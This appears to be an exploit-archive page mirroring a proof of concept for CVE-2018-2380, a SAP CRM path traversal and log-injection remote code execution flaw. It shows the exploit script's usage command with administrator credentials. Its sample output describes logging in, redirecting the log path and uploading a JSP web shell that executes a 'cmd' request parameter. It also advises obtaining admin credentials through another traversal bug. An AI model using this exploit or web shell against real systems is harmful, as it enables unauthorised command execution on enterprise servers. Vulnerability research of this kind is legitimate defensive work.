Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2018-2380 PoC — SAP CRM 路径遍历漏洞

Source
https://github.com/erpscanteam/CVE-2018-2380
Associated Vulnerability
Title:SAP CRM 路径遍历漏洞 (CVE-2018-2380)
Description:SAP CRM(Customer Relationship Management)是德国思爱普(SAP)公司的一套客户关系管理解决方案。该方案包括销售管理、营销管理、客户服务系统等模块。 SAP CRM中存在目录遍历漏洞,该漏洞源于程序没有充分的验证路径信息。攻击者可通过发送带有目录遍历序列的特制请求利用该漏洞在应用程序的上下文中检索任意文件。以下版本受到影响:SAP CRM 7.01版本,7.02版本,7.30版本,7.31版本,7.33版本,7.54版本。
Description
PoC of Remote Command Execution via Log injection on SAP NetWeaver AS JAVA CRM
Readme
# CVE-2018-2380 (CVSS v3 Base Score: 6.6/10)
PoC of Remote Command Execution via Log injection on SAP NetWeaver AS JAVA CRM
Script usage example 
```
python crm_rce-CVE-2018-2380.py --host 127.0.0.1 --port 50001 --username administrator --password 123QWEasd --SID DM0 --ssl true
```

Where
--host is a SAP server IP
--port SAP NetWeaver AS Java port
username and password of SAP administrator you can get using SAP Redwood directory traversal vulnerability. 


example script usage output
```
C:\exploits\SAP>crm_rce-CVE-2018-2380.py --host 127.0.0.1 --port 50001 --username administrator --password 123QWEasd --SID DM0 --ssl true

 _______  _______  _______  _______  _______  _______  _
(  ____ \(  ____ )(  ____ )(  ____ \(  ____ \(  ___  )( (    /|
| (    \/| (    )|| (    )|| (    \/| (    \/| (   ) ||  \  ( |
| (__    | (____)|| (____)|| (_____ | |      | (___) ||   \ | |
|  __)   |     __)|  _____)(_____  )| |      |  ___  || (\ \) |
| (      | (\ (   | (            ) || |      | (   ) || | \   |
| (____/\| ) \ \__| )      /\____) || (____/\| )   ( || )  \  |
(_______/|/   \__/|/       \_______)(_______/|/     \||/    )_)
Vahagn @vah_13 Vardanian
Bob @NewFranny
Mathieu @gelim
CVE-2018-2380


[!] Try to get RCE using log injection
[!] Get j_salt token for requests
[!] Login to the SAP portal
[!] Change log path
[!] Upload "Runtime.getRuntime().exec(request.getParameter("cmd")) " shell to https://127.0.0.1:50001/ERPScan_shell_31275.0.jsp?cmd=ipconfig
[!] Restore logs path to ./default_log_name.log
[!] Enjoy!

C:\exploits\SAP>
```
File Snapshot

 [4.0K]  /data/pocs/a5188b35588375633d14b49d78c7e3f2d63fdd58
├── [6.3K]  crm_rce-CVE-2018-2380.py
└── [1.5K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.